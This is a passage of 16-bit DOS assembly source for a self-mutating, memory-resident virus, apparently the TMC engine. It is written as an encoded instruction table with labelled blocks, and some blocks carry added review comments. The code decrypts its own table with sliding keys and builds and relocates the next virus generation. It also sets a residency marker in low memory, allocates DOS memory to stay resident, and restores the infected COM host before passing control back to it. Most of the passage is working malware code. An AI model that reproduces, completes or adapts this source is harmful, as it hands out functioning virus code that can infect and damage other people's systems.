db 01h ; One byte instruction pop si ; Load SI from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_messag db 11101110b ; Beginning of block dw 0bc6h ; Block identification of exam_mes... db 03h ; Three bytes instruction cmp ax,2328h ; Block identification of message? db 01110101b+10000000b ; Not equal? Jump to exam_probab dw 0bedh ; Pointer to exam_probab db 03h ; Three bytes instruction mov ax,14h ; Probability of including message db 04h ; Four bytes instruction cmp [bp+1234h],ax ; Include message? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01110011b+10000000b ; Above or equal? Jump to examine_... dw 0bebh ; Pointer to examine_nex db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 02h ; Two bytes instruction sub al,10h ; AL = length of message db 02h ; Two bytes instruction mov ah,00h ; Zero AH db 02h ; Two bytes instruction add si,ax ; SI = offset of end of message db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block exam_probab db 11101110b ; Beginning of block dw 0bedh ; Block identification of exam_pro... db 03h ; Three bytes instruction cmp ax,0bech ; Block identification of probabi...? db 01110101b+10000000b ; Not equal? Jump to examine_nex dw 0bebh ; Pointer to examine_nex db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = probability_ db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 01h ; One byte instruction dec ax ; Decrease probability db 03h ; Three bytes instruction cmp ax,05h ; Probability too small? db 01110011b+10000000b ; Above or equal? Jump to store_pr... dw 0bf5h ; Pointer to store_proba db 03h ; Three bytes instruction mov ax,64h ; Reset probability db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bf5h ; Pointer to store_proba db 11101111b ; End of block store_proba db 11101110b ; Beginning of block dw 0bf5h ; Block identification of store_pr... 
db 03h ; Three bytes instruction mov es:[bx],ax ; Store probability db 03h ; Three bytes instruction add bx,02h ; Add two to offset within next vi... db 03h ; Three bytes instruction add si,03h ; SI = offset of beginning of next... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bebh ; Pointer to examine_nex db 11101111b ; End of block examine_nex db 11101110b ; Beginning of block dw 0bebh ; Block identification of examine_... db 01h ; One byte instruction pop di ; Load DI from stack db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be0h ; Pointer to decrypt_byt db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc2h ; Pointer to exam_bl__ db 11101111b ; End of block sto_call_jm_ db 11101110b ; Beginning of block dw 0bc7h ; Block identification of sto_call... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push di ; Save DI at stack db 05h ; Five bytes instruction mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... db 02h ; Two bytes instruction mov ax,bx ; AX = offset within next virus ge... db 01h ; One byte instruction stosw ; Store offset within next virus g... db 11101000b ; CALL imm16 (opcode 0e8h) dw 0be1h ; Pointer to decrypt_id_ db 01h ; One byte instruction stosw ; Store block identification db 05h ; Five bytes instruction mov es:[06h],di ; Store offset within CALL; JMP; J... db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 03h ; Three bytes instruction mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to exam_bl_ dw 0bc1h ; Pointer to exam_bl_ db 01h ; One byte instruction inc bx ; Increase offset within next viru... db 01h ; One byte instruction inc bx ; Increase offset within next viru... 
db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc1h ; Pointer to exam_bl_ db 11101111b ; End of block split_bloc_ db 11101110b ; Beginning of block dw 0bc8h ; Block identification of split_bloc_ db 04h ; Four bytes instruction mov es:[di+02h],bx ; Store offset within next virus g... db 03h ; Three bytes instruction add bx,03h ; Add three to offset within next ... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bc9h ; Pointer to end_of_bloc db 11101111b ; End of block end_of_bloc db 11101110b ; Beginning of block dw 0bc9h ; Block identification of end_of_b... db 01h ; One byte instruction dec si ; Decrease offset of block within ... db 03h ; Three bytes instruction mov es:[di],si ; Store offset of block within table db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bbdh ; Pointer to split_bloc db 11101111b ; End of block exam_tbl_in db 11101110b ; Beginning of block dw 0bcah ; Block identification of exam_tbl... db 06h ; Six bytes instruction cmp word ptr es:[0ch],00h db 01110101b+10000000b ; End of second table? Jump to cor... dw 0fa1h ; Pointer to correc_i16 db 01h ; One byte instruction pop si ; Load SI from stack db 05h ; Five bytes instruction mov es:[0ch],bx ; Store offset within next virus g... db 04h ; Four bytes instruction add si,(second_table-first_table) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0fa0h ; Pointer to initial_tmc_ db 11101111b ; End of block correc_i16 db 11101110b ; Beginning of block dw 0fa1h ; Block identification of correc_i16 db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction pop ds ; Load DS from stack (ES) db 04h ; Four bytes instruction sub bx,4000h ; Subtract offset of next virus ge... db 04h ; Four bytes instruction mov ds:[0eh],bx ; Store length of virus db 03h ; Three bytes instruction mov si,2000h ; SI = offset of CALL; JMP; Jcc im... db 04h ; Four bytes instruction mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of CALL; JMP; Jc... 
db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 02h ; Two bytes instruction shr cx,01h ; Divide number of CALL imm16; JMP... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcbh ; Pointer to jmp_call_lo db 11101111b ; End of block jmp_call_lo db 11101110b ; Beginning of block dw 0bcbh ; Block identification of jmp_call... db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,1000h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block find_block__ db 11101110b ; Beginning of block dw 0bcch ; Block identification of find_blo... db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc dw 0bcdh ; Pointer to found_bloc db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to find_block__ dw 0bcch ; Pointer to find_block__ db 11101111b ; End of block found_bloc db 11101110b ; Beginning of block dw 0bcdh ; Block identification of found_bloc db 02h ; Two bytes instruction mov dx,[si] ; DX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 02h ; Two bytes instruction mov al,[bx] ; AL = first byte of instruction db 02h ; Two bytes instruction cmp al,11110000b ; Jump condition? db 01110010b+10000000b ; Below? Jump to sto_call_j dw 0bcfh ; Pointer to sto_call_j db 03h ; Three bytes instruction sub byte ptr [bx],10000000b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 01h ; One byte instruction push dx ; Save DX at stack db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 8-bit immediate db 03h ; Three bytes instruction cmp dx,7fh ; 8-bit immediate out of range? db 01111111b+10000000b ; Greater? Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 03h ; Three bytes instruction cmp dx,0ff80h ; 8-bit immediate out of range? db 01111100b+10000000b ; Less? 
Jump to invert_jcc_ dw 0bceh ; Pointer to invert_jcc_ db 02h ; Two bytes instruction mov [bx],dl ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of end of Jcc imm8 db 04h ; Four bytes instruction mov [bx],1001000010010000b db 04h ; Four bytes instruction mov byte ptr [bx+02h],10010000b db 01h ; One byte instruction pop dx ; Load DX from stack db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block invert_jcc_ db 11101110b ; Beginning of block dw 0bceh ; Block identification of invert_jcc_ db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction dec bx ; BX = offset of Jcc imm8 db 03h ; Three bytes instruction xor byte ptr [bx],00000001b db 01h ; One byte instruction inc bx ; BX = offset of 8-bit immediate db 03h ; Three bytes instruction mov byte ptr [bx],03h ; Store 8-bit immediate db 01h ; One byte instruction inc bx ; BX = offset of JMP imm16 db 02h ; Two bytes instruction mov al,11101001b ; JMP imm16 (opcode 0e9h) db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bcfh ; Pointer to sto_call_j db 11101111b ; End of block sto_call_j db 11101110b ; Beginning of block dw 0bcfh ; Block identification of sto_call... db 02h ; Two bytes instruction mov [bx],al ; Store CALL imm16; JMP imm16 db 01h ; One byte instruction inc bx ; BX = offset of 16-bit immediate db 02h ; Two bytes instruction sub dx,bx ; Subtract offset within next viru... db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 01h ; One byte instruction dec dx ; Decrease 16-bit immediate db 02h ; Two bytes instruction mov [bx],dx ; Store 16-bit immediate db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd0h ; Pointer to correc_i16_ db 11101111b ; End of block correc_i16_ db 11101110b ; Beginning of block dw 0bd0h ; Block identification of correc_... db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to jmp_call_lo dw 0bcbh ; Pointer to jmp_call_lo db 03h ; Three bytes instruction mov si,3000h ; SI = offset of data information db 04h ; Four bytes instruction mov cx,ds:[08h] ; CX = offset of end of data infor... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of data informat... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 02h ; Two bytes instruction shr cx,01h ; Divide number of data references... db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd1h ; Pointer to data_ref_lo db 11101111b ; End of block data_ref_lo db 11101110b ; Beginning of block dw 0bd1h ; Block identification of data_ref_lo db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction lodsw ; AX = offset of block within data... db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push si ; Save SI at stack db 03h ; Three bytes instruction mov si,1000h ; SI = offset of block information db 04h ; Four bytes instruction mov cx,ds:[04h] ; CX = offset of end of block info... db 02h ; Two bytes instruction sub cx,si ; Subtract offset of block informa... db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 02h ; Two bytes instruction shr cx,01h ; Divide number of block by two db 11101001b ; JMP imm16 (opcode 0e9h) dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block find_bloc db 11101110b ; Beginning of block dw 0bd2h ; Block identification to find_bloc db 03h ; Three bytes instruction cmp ax,[si+02h] ; Found block? db 01110100b+10000000b ; Equal? Jump to found_bloc_ dw 0bd3h ; Pointer to found_bloc_ db 03h ; Three bytes instruction add si,04h ; SI = offset of next block in table db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? 
Jump to find_bloc dw 0bd2h ; Pointer to find_bloc db 11101111b ; End of block found_bloc_ db 11101110b ; Beginning of block dw 0bd3h ; Block identification of found_bloc_ db 02h ; Two bytes instruction mov ax,[si] ; AX = offset of block db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack (AX) db 03h ; Three bytes instruction sub ax,4000h ; Subtract offset of next virus ge... db 02h ; Two bytes instruction mov [bx],ax ; Store 16-bit immediate db 01h ; One byte instruction dec cx ; Decrease counter db 01110101b+10000000b ; Not zero? Jump to data_ref_lo dw 0bd1h ; Pointer to data_ref_lo db 11101001b ; JMP imm16 (opcode 0e9h) dw 1772h ; Pointer to restore_cod db 11101111b ; End of block restore_cod db 11101110b ; Beginning of block dw 1772h ; Block identification of restore_... db 04h ; Four bytes instruction mov ax,[bp+1234h] ; AX = segment of PSP for current ... db 11101101b ; Data reference dw 0befh ; Pointer to program_seg_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial SS relative to star... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial SS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... db 01h ; One byte instruction push cx ; Save CX at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save initial SP at stack db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = initial CS relative to star... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 03h ; Three bytes instruction add cx,10h ; Add ten to initial CS relative t... db 02h ; Two bytes instruction add cx,ax ; Add segment of PSP for current p... 
; Tail of restore_cod, then the head of an unlabelled twin block (id 1774h).
; restore_cod pushes seven words in this order: absolute SS, initial SP,
; absolute CS, initial IP, the PSP segment, the saved memory-block size and
; DS. For a COM host it then puts the three saved bytes back at cs:[100h].
; The code that consumes the pushed words is not in this part of the listing.
        db 01h                          ; One byte instruction
        push cx                         ; Save CX at stack (initial CS + 10h + PSP segment, computed just above)
        db 04h                          ; Four bytes instruction
        push [bp+1234h]                 ; Save initial IP at stack
        db 11101101b                    ; Data reference
        dw 138bh                        ; Pointer to initial_ip_
        db 01h                          ; One byte instruction
        push ax                         ; Save segment of PSP for current process at stack
        db 04h                          ; Four bytes instruction
        push [bp+1234h]                 ; Save size of memory block in paragraphs at stack
        db 11101101b                    ; Data reference
        dw 1395h                        ; Pointer to mcb_size__
        db 01h                          ; One byte instruction
        push ds                         ; Save DS at stack
        db 02h                          ; Two bytes instruction
        mov cl,00h                      ; COM executable
        db 04h                          ; Four bytes instruction
        cmp [bp+1234h],cl               ; COM executable?
        db 11101101b                    ; Data reference
        dw 1388h                        ; Pointer to executa_sta
        db 01110101b+10000000b          ; Not equal? Jump to move_virus__ (75h = JNE, stored as opcode + 80h)
        dw 1390h                        ; Pointer to move_virus__
        db 04h                          ; Four bytes instruction
        lea si,[bp+1234h]               ; SI = offset of origin_code_
        db 11101101b                    ; Data reference
        dw 1f40h                        ; Pointer to origin_code_
        db 03h                          ; Three bytes instruction
        mov ax,cs:[si]                  ; AX = first two bytes of original code
        db 04h                          ; Four bytes instruction
        mov cs:[100h],ax                ; Store first two bytes of original code at the COM entry point
        db 04h                          ; Four bytes instruction
        mov al,cs:[si+02h]              ; AL = last byte of original code
        db 04h                          ; Four bytes instruction
        mov cs:[100h+02h],al            ; Store last byte of original code
        db 11101001b                    ; JMP imm16 (opcode 0e9h)
        dw 1390h                        ; Pointer to move_virus__
        db 11101111b                    ; End of block
; Unlabelled block. Its entries repeat restore_cod except that it pushes
; incorrec_ip where restore_cod pushes initial_ip_. Nothing visible here
; jumps to id 1774h; its purpose is not evident from this part of the listing.
        db 11101110b                    ; Beginning of block
        dw 1774h                        ; Block identification (block has no label in the listing)
        db 04h                          ; Four bytes instruction
        mov ax,[bp+1234h]               ; AX = segment of PSP for current process
        db 11101101b                    ; Data reference
        dw 0befh                        ; Pointer to program_seg_
        db 04h                          ; Four bytes instruction
        mov cx,[bp+1234h]               ; CX = initial SS relative to start of ... (comment truncated in the listing)
        db 11101101b                    ; Data reference
        dw 138ah                        ; Pointer to initial_ss_
        db 03h                          ; Three bytes instruction
        add cx,10h                      ; Add 10h (sixteen paragraphs, the length of the PSP) to initial SS; the listing's "ten" is hexadecimal
        db 02h                          ; Two bytes instruction
        add cx,ax                       ; Add segment of PSP for current process
; Remainder of the unlabelled block 1774h, then the header of move_virus__.
; The entries repeat restore_cod except for the push of incorrec_ip. The
; pushed words are, in order: absolute SS, initial SP, absolute CS,
; incorrect IP, the PSP segment, the saved memory-block size and DS.
        db 01h                          ; One byte instruction
        push cx                         ; Save CX at stack (initial SS + 10h + PSP segment, computed just above)
        db 04h                          ; Four bytes instruction
        push [bp+1234h]                 ; Save initial SP at stack
        db 11101101b                    ; Data reference
        dw 138ch                        ; Pointer to initial_sp_
        db 04h                          ; Four bytes instruction
        mov cx,[bp+1234h]               ; CX = initial CS relative to start of ... (comment truncated in the listing)
        db 11101101b                    ; Data reference
        dw 1389h                        ; Pointer to initial_cs_
        db 03h                          ; Three bytes instruction
        add cx,10h                      ; Add 10h (sixteen paragraphs, the length of the PSP) to initial CS; the listing's "ten" is hexadecimal
        db 02h                          ; Two bytes instruction
        add cx,ax                       ; Add segment of PSP for current process
        db 01h                          ; One byte instruction
        push cx                         ; Save CX at stack
        db 04h                          ; Four bytes instruction
        push [bp+1234h]                 ; Save incorrect IP at stack (restore_cod pushes initial_ip_ at this point)
        db 11101101b                    ; Data reference
        dw 1773h                        ; Pointer to incorrec_ip
        db 01h                          ; One byte instruction
        push ax                         ; Save segment of PSP for current process at stack
        db 04h                          ; Four bytes instruction
        push [bp+1234h]                 ; Save size of memory block in paragraphs at stack
        db 11101101b                    ; Data reference
        dw 1395h                        ; Pointer to mcb_size__
        db 01h                          ; One byte instruction
        push ds                         ; Save DS at stack
        db 02h                          ; Two bytes instruction
        mov cl,00h                      ; COM executable
        db 04h                          ; Four bytes instruction
        cmp [bp+1234h],cl               ; COM executable?
        db 11101101b                    ; Data reference
        dw 1388h                        ; Pointer to executa_sta
        db 01110101b+10000000b          ; Not equal? Jump to move_virus__ (75h = JNE, stored as opcode + 80h)
        dw 1390h                        ; Pointer to move_virus__
        db 04h                          ; Four bytes instruction
        lea si,[bp+1234h]               ; SI = offset of origin_code_
        db 11101101b                    ; Data reference
        dw 1f40h                        ; Pointer to origin_code_
        db 03h                          ; Three bytes instruction
        mov ax,cs:[si]                  ; AX = first two bytes of original code
        db 04h                          ; Four bytes instruction
        mov cs:[100h],ax                ; Store first two bytes of original code at the COM entry point
        db 04h                          ; Four bytes instruction
        mov al,cs:[si+02h]              ; AL = last byte of original code (the listing said AX; the instruction loads AL)
        db 04h                          ; Four bytes instruction
        mov cs:[100h+02h],al            ; Store last byte of original code
        db 11101001b                    ; JMP imm16 (opcode 0e9h)
        dw 1390h                        ; Pointer to move_virus__
        db 11101111b                    ; End of block
move_virus__ db 11101110b               ; Beginning of block
        dw 1390h                        ; Block identification of move_virus__
; First part of move_virus__. It tests and sets a one-byte residency marker
; at 0000:0501h, moves the freshly generated copy from offset 4000h to
; offset 0 of the work segment, and computes the sizes used by the resize and
; allocate calls that follow.
        db 02h                          ; Two bytes instruction
        xor ax,ax                       ; Zero AX
        db 02h                          ; Two bytes instruction
        mov ds,ax                       ; DS = segment of DOS communication area (segment 0000h; comment truncated in the listing)
        db 05h                          ; Five bytes instruction
        cmp byte ptr ds:[501h],10h      ; Residency marker: is the byte at 0000:0501h already 10h?
        db 01110100b+10000000b          ; Already resident? Jump to virus_exit_ (74h = JE, stored as opcode + 80h)
        dw 65h                          ; Pointer to virus_exit_
        db 05h                          ; Five bytes instruction
        mov byte ptr ds:[501h],10h      ; Set the residency marker; this byte lies outside any block allocated in this table
        db 01h                          ; One byte instruction
        push es                         ; Save ES at stack
        db 01h                          ; One byte instruction
        pop ds                          ; Load DS from stack (ES)
        db 03h                          ; Three bytes instruction
        mov ax,ds:[0ch]                 ; AX = offset within next virus generation, as stored at [0ch] by exam_tbl_in
        db 03h                          ; Three bytes instruction
        sub ax,4000h                    ; Subtract offset of next virus generation (4000h)
        db 04h                          ; Four bytes instruction
; NOTE(review): the listing's comment says "crypt_table", but the data
; reference that follows names vir_exit_of, which the data area describes as
; "Offset of virus_exit" -- confirm which is meant. The operand is
; BP-relative, so it is SS-based and unaffected by the DS change above.
        mov [bp+1234h],ax               ; Store offset of crypt_table
        db 11101101b                    ; Data reference
        dw 0bf1h                        ; Pointer to vir_exit_of
        db 04h                          ; Four bytes instruction
        mov cx,ds:[0eh]                 ; CX = length of virus, as stored at [0eh] by correc_i16
        db 04h                          ; Four bytes instruction
        mov [bp+1234h],cx               ; Store length of virus
        db 11101101b                    ; Data reference
        dw 0bf0h                        ; Pointer to virus_lengt
        db 03h                          ; Three bytes instruction
        mov si,4000h                    ; SI = offset of next virus generation
        db 02h                          ; Two bytes instruction
        xor di,di                       ; Zero DI
        db 02h                          ; Two bytes instruction
; NOTE(review): DS was loaded from ES above, so this copy runs from offset
; 4000h to offset 0 of the same segment; "top of memory" in the listing's
; comment does not describe that.
        rep movsb                       ; Move virus to top of memory
        db 02h                          ; Two bytes instruction
        mov cl,04h                      ; Divide by paragraphs (shift count 4 = divide by 16)
        db 02h                          ; Two bytes instruction
        shr di,cl                       ; DI = length of next virus generation in paragraphs (DI ended at the copied length)
        db 01h                          ; One byte instruction
        inc di                          ; Increase length of next virus generation by one paragraph
        db 04h                          ; Four bytes instruction
        mov bx,[bp+1234h]               ; BX = size of memory block in paragraphs
        db 11101101b                    ; Data reference
        dw 1394h                        ; Pointer to mcb_size___
        db 04h                          ; Four bytes instruction
        sub bx,[bp+1234h]               ; Subtract new size in paragraphs
        db 11101101b                    ; Data reference
        dw 1393h                        ; Pointer to new_mcb_siz
        db 02h                          ; Two bytes instruction
        sub bx,di                       ; Subtract length of next virus generation in paragraphs
        db 01h                          ; One byte instruction
        dec bx                          ; Decrease new size in paragraphs
        db 01h                          ; One byte instruction
        dec bx                          ; Decrease new size in paragraphs
        db 02h                          ; Two bytes instruction
        cmp bx,di                       ; Insufficient memory? (the conditional-jump entry follows)
db 01110010b+10000000b ; Below? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov ah,4ah ; Resize memory block db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 02h ; Two bytes instruction mov bx,di ; BX = number of paragraphs to all... db 02h ; Two bytes instruction mov ah,48h ; Allocate memory db 02h ; Two bytes instruction int 21h db 01110010b+10000000b ; Error? Jump to virus_exit_ dw 65h ; Pointer to virus_exit_ db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction dec ax ; AX = segment of current Memory C... db 02h ; Two bytes instruction mov es,ax ; ES = segment of current Memory C... db 07h ; Seven bytes instruction mov word ptr es:[01h],08h db 01h ; One byte instruction pop es ; Load ES from stack (AX) db 04h ; Four bytes instruction mov cx,[bp+1234h] ; CX = length of virus db 11101101b ; Data reference dw 0bf0h ; Pointer to virus_lengt db 02h ; Two bytes instruction xor si,si ; Zero SI db 02h ; Two bytes instruction xor di,di ; Zero DI db 02h ; Two bytes instruction rep movsb ; Move virus to top of memory db 01h ; One byte instruction push es ; Save ES at stack db 04h ; Four bytes instruction push [bp+1234h] ; Save offset of virus_exit_ at stack db 11101101b ; Data reference dw 0bf1h ; Pointer to vir_exit_of db 04h ; Four bytes instruction mov al,[bp+1234h] ; AL = 8-bit encryption/decryption... db 11101101b ; Data reference dw 0bd7h ; Pointer to crypt_key_ db 04h ; Four bytes instruction mov ah,[bp+1234h] ; AH = 8-bit sliding encrytion/dec... 
; TMC table entries, one statement per line. Entry format used throughout this
; table: `db n` (n <= 10h) is the length of the instruction that follows,
; `db n+10h` announces n bytes of data, 11101110b / 11101111b mark the
; beginning / end of a block, and the CALL / JMP / Jcc / data-reference markers
; are followed by a 16-bit block identification instead of a real offset.
; NOTE(review): the 1234h operand in front of each data reference looks like a
; placeholder that is replaced when the table is compiled - confirm.
;
; The first five entries close a block that starts earlier in the file.
        db 11101101b ; Data reference
        dw 0bd8h ; Pointer to sliding_key_
        db 01h ; One byte instruction
        retf ; Return far
        db 11101111b ; End of block

; terminate_: ends the process through DOS function 4c00h.
terminate_ db 11101110b ; Beginning of block
        dw 0beeh ; Block identification of terminate_
        db 03h ; Three bytes instruction
        mov ax,4c00h ; Terminate with return code
        db 02h ; Two bytes instruction
        int 21h
        db 11101111b ; End of block

; get_rnd_num_: returns a 16-bit value in AX. Two reads of I/O port 40h are
; combined with the word at es:[01h], rotated left by the result's own high
; byte, and written back to es:[01h] as the state for the next call.
; CX is preserved.
get_rnd_num_ db 11101110b ; Beginning of block
        dw 0bd4h ; Block identification of get_rnd_num_
        db 01h ; One byte instruction
        push cx ; Save CX at stack
        db 02h ; Two bytes instruction
        in al,40h ; AL = 8-bit random number (read from I/O port 40h)
        db 02h ; Two bytes instruction
        mov ah,al ; AH = 8-bit random number
        db 02h ; Two bytes instruction
        in al,40h ; AL = 8-bit random number (second read of port 40h)
        db 05h ; Five bytes instruction
        xor ax,es:[01h] ; AX = 16-bit random number (mixed with stored state)
        db 02h ; Two bytes instruction
        mov cl,ah ; CL = high-order byte of 16-bit random number
        db 02h ; Two bytes instruction
        rol ax,cl ; AX = 16-bit random number
        db 04h ; Four bytes instruction
        mov es:[01h],ax ; Store 16-bit random number
        db 01h ; One byte instruction
        pop cx ; Load CX from stack
        db 01h ; One byte instruction
        ret ; Return
        db 11101111b ; End of block

; rnd_in_rang: returns in AX the remainder of get_rnd_num_ divided by BP.
; A zero BP is routed to zero_range_ so that DIV is never executed with a
; zero divisor. DX is preserved.
rnd_in_rang db 11101110b ; Beginning of block
        dw 0bd5h ; Block identification of rnd_in_rang
        db 02h ; Two bytes instruction
        or bp,bp ; Zero BP?
        db 01110100b+10000000b ; Zero? Jump to zero_range_
        dw 0bd6h ; Pointer to zero_range_
        db 01h ; One byte instruction
        push dx ; Save DX at stack
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0bd4h ; Pointer to get_rnd_num_
        db 02h ; Two bytes instruction
        xor dx,dx ; Zero DX
        db 02h ; Two bytes instruction
        div bp ; DX = random number within range (remainder)
        db 01h ; One byte instruction
        xchg ax,dx ; AX = random number within range
        db 01h ; One byte instruction
        pop dx ; Load DX from stack
        db 01h ; One byte instruction
        ret ; Return
        db 11101111b ; End of block

; zero_range_: result for an empty range, AX = 0.
zero_range_ db 11101110b ; Beginning of block
        dw 0bd6h ; Block identification of zero_range_
        db 02h ; Two bytes instruction
        xor ax,ax ; AX = random number within range
        db 01h ; One byte instruction
        ret ; Return
        db 11101111b ; End of block

; decrypt_byt (first part; the block continues in the following entries):
; saves AH in ah__, then derives the key for the byte at [si] from the byte's
; position: AL = low byte of (offset within tmc_table_ * sliding_key_) plus
; crypt_key_. MUL with a word operand also overwrites DX.
decrypt_byt db 11101110b ; Beginning of block
        dw 0be0h ; Block identification of decrypt_byt
        db 04h ; Four bytes instruction
        mov [bp+1234h],ah ; Store AH
        db 11101101b ; Data reference
        dw 0bd9h ; Pointer to ah__
        db 02h ; Two bytes instruction
        mov ax,si ; AX = offset within table
        db 02h ; Two bytes instruction
        sub ax,bp ; Subtract delta offset from offse...
        db 03h ; Three bytes instruction
        sub ax,1234h ; Subtract offset of tmc_table_ fr...
        db 11101101b ; Data reference
        dw 4c5h ; Pointer to tmc_table_
        db 04h ; Four bytes instruction
        mul word ptr [bp+1234h] ; AL = 8-bit sliding encryptio...
        db 11101101b ; Data reference
        dw 0bd8h ; Pointer to sliding_key_
        db 04h ; Four bytes instruction
        add al,[bp+1234h] ; AL = 8-bit encryption/decryption...
; TMC table entries, one statement per line: `db n` gives the length of the
; instruction that follows; CALL / data-reference markers are followed by a
; 16-bit block identification rather than a real offset.
;
; The entries up to the first "End of block" finish decrypt_byt: the key
; already in AL is XORed with the byte at [si], the caller's AH is restored
; from ah__, and SI advances by one.
        db 11101101b ; Data reference
        dw 0bd7h ; Pointer to crypt_key_
        db 02h ; Two bytes instruction
        xor al,[si] ; AL = byte of decrypted table
        db 04h ; Four bytes instruction
        mov ah,[bp+1234h] ; AH = stored AH
        db 11101101b ; Data reference
        dw 0bd9h ; Pointer to ah__
        db 01h ; One byte instruction
        inc si ; Increase offset within table
        db 01h ; One byte instruction
        ret ; Return
        db 11101111b ; End of block

; decrypt_id_: decrypts two consecutive table bytes and returns them as a
; word in AX, first byte in AL and second byte in AH.
decrypt_id_ db 11101110b ; Beginning of block
        dw 0be1h ; Block identification of decrypt_id_
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0be0h ; Pointer to decrypt_byt
        db 02h ; Two bytes instruction
        mov ah,al ; AH = first byte of decrypted table
        db 11101000b ; CALL imm16 (opcode 0e8h)
        dw 0be0h ; Pointer to decrypt_byt
        db 02h ; Two bytes instruction
        xchg al,ah ; AL = first byte, AH = second byte of decrypted table
        db 01h ; One byte instruction
        ret ; Return
        db 11101111b ; End of block

; virus_exit_ (first part; the block continues in the following entries):
; frees the memory block whose segment is on the stack, resizes the program's
; own block back to the size popped into BX, and writes the host's initial
; IP and CS into the operand of the far JMP stored in jmp_imm32_.
virus_exit_ db 11101110b ; Beginning of block
        dw 65h ; Block identification of virus_exit_
        db 01h ; One byte instruction
        pop es ; Load ES from stack
        db 02h ; Two bytes instruction
        mov ah,49h ; Free memory
        db 02h ; Two bytes instruction
        int 21h
        db 01h ; One byte instruction
        pop bx ; Load BX from stack
        db 01h ; One byte instruction
        pop ax ; Load AX from stack
        db 02h ; Two bytes instruction
        mov ds,ax ; DS = segment of PSP for current ...
        db 02h ; Two bytes instruction
        mov es,ax ; ES = segment of PSP for current ...
        db 02h ; Two bytes instruction
        mov ah,4ah ; Resize memory block
        db 02h ; Two bytes instruction
        int 21h
        db 04h ; Four bytes instruction
